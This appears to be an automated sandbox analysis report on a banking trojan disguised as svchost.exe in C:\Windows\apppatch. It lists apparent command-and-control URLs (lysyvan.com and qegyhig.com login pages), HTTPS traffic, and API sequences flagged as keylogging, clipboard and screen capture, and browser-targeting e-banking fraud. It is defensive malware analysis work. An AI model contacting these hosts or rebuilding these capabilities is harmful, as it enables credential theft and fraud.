Source: svchost.exe, 00000002.00000003.2266293470.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2274103854.000000000B5C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034066748.0000000002913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589582786.0000000002918000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2355760334.0000000000869000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2340483768.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282216366.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797181717.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2371312988.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B44F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2149012437.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151452523.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789392843.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/
Source: svchost.exe, 00000002.00000003.2149012437.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151452523.0000000004505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com//
Source: svchost.exe, 00000002.00000003.1650761420.00000000066B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250648310.000000000460C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364803259.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250648310.0000000004609000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793845752.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650661125.0000000006615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1373797577.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151678696.00000000046C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2256311817.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364340115.000000000667A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364072195.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135962795.0000000006716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793717816.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364274573.0000000006795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581298263.00000000066BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.2149012437.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151452523.0000000004505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/m/
Source: svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796639933.0000000006795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/wp-json/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57343
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57344
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57343 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57344 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57350
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57351
Source: unknownNetwork traffic detected: HTTP traffic on port 57351 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57343 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57344 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57350 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\apppatch\svchost.exeCode function: [tab]2_2_02BC2F40
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02BC2F40
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02BC2F40
Source: C:\Windows\apppatch\svchost.exeCode function: [ins]2_2_02BC2F40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC3220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,2_2_02BC3220
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_02BB9530
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00699530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00699530
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_014D9530
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD54A0 Sleep,_snprintf,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,2_2_02BD54A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC2F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,2_2_02BC2F40

E-Banking Fraud

barindex
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe2_2_02BC1900
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BB3610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_006A78A0
